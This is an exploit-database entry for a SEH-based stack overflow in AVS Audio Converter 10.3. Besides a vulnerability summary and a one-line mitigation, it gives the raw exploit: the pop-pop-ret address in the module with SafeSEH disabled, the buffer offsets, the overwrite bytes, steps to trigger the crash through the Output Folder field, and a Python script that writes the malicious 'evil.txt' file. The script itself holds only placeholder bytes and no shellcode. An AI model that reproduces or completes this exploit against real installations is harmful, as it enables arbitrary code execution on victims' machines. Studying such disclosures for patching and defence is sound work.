AVS Audio Converter 10.3 - Stack Overflow (SEH)

vendor:

AVSAudioConverter

by:

Yehia Elghaly - Mrvar0x

7.8

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: AVSAudioConverter

Affected Version From: 10.3

Affected Version To: 10.3.1.633

Patch Exists: NO

Related CWE:

CPE: AVSAudioConverter.exe

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Professional x86

2022

AVS Audio Converter 10.3 – Stack Overflow (SEH)

AVS Audio Converter 10.3 is vulnerable to a stack overflow vulnerability due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by crafting a malicious file and sending it to the victim, which can then be used to execute arbitrary code on the victim's system. The vulnerable module is AVSAudioConverter.exe, which has SafeSEH disabled. The exploit involves allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes. The exploit can be generated using python 2.7.x on Linux.

Mitigation:

The vendor should ensure proper bounds checking of user-supplied input to prevent stack overflow vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)
# Discovered by: Yehia Elghaly - Mrvar0x
# Discovered Date: 2022-10-16
# Tested Version: 10.3.1.633
# Tested on OS: Windows 7 Professional x86

#pop+ret Address=005154E6
#Message=  0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] 
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)

# The only module that has SafeSEH disabled.
# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | 
# 0x00400000 | 0x01003000 | False  | False   | False |  False   | False  |

#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.

#Buffer  = '\x41'* 260
#nSEH    = '\x42'*4
#SEH     = '\x43'*4
#ESI     = 'D*44' # ESI Overwrite 

#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44
#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44


# Rexploit:
# Generate the 'evil.txt' payload using python 2.7.x on Linux.
# Open the file 'evil.txt' Copy.
# Paste at'Output Folder and click 'Browse'.

#!/usr/bin/python -w
  
filename="evil.txt"
 
buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()